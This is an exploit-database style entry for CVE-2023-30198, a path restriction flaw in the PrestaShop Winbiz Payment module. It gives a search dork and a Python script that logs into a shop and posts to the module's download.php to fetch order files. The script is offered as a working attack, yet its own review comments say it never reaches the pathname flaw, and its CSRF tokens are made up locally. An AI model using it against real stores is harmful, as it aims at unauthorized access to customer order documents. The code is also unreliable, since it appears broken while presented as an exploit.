
7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198
import random
import string

import requests

# Flow of this script, as written: one POST carrying credentials to the
# login page, one POST carrying an order id to the module's download.php,
# then the raw response body is written to a local file.
# NOTE(review): the only parameter sent to download.php here is a numeric
# id_order; the script does not itself show how the pathname issue named in
# the header (CVE-2023-30198) is reached.
# For defenders, the observable this script produces is a POST to
# /modules/winbizpayment/downloads/download.php in the web server access log.


def _random_token():
    # 32 characters drawn from A-Z and 0-9. The value is produced locally and
    # never read from a server response; `random` is not a cryptographic source.
    alphabet = string.ascii_uppercase + string.digits
    return ''.join(random.choices(alphabet, k=32))


# --- Settings (all placeholders in the published script) -------------------

# Site root and the two endpoints derived from it
base_url = "http://example.com"
login_url = base_url + "/authentication.php"
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# Account used for the login request
username = "admin"
password = "password123"

# Order whose PDF is requested, and where the response body is stored
order_id = 1234
file_path = "/tmp/order_%d.pdf" % order_id

# Filled in after the login request
session_cookies = None

# --- Step 1: log in ---------------------------------------------------------

csrf_token = _random_token()
login_data = {
    "email": username,
    "passwd": password,
    "csrf_token": csrf_token,
}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Snapshot of whatever cookies the login response set on the session
session_cookies = session.cookies.get_dict()

# --- Step 2: request the order document -------------------------------------

# A second, independent random value is sent as the token for this request
csrf_token = _random_token()
download_data = {
    "id_order": order_id,
    "csrf_token": csrf_token,
}
response = session.post(download_url, data=download_data, cookies=session_cookies)

# --- Step 3: store the response ---------------------------------------------

# The body is written whatever the HTTP status was, so an error page ends up
# in the file just the same; nothing here inspects response.status_code.
with open(file_path, "wb") as out_file:
    out_file.write(response.content)

print("File downloaded to %s" % file_path)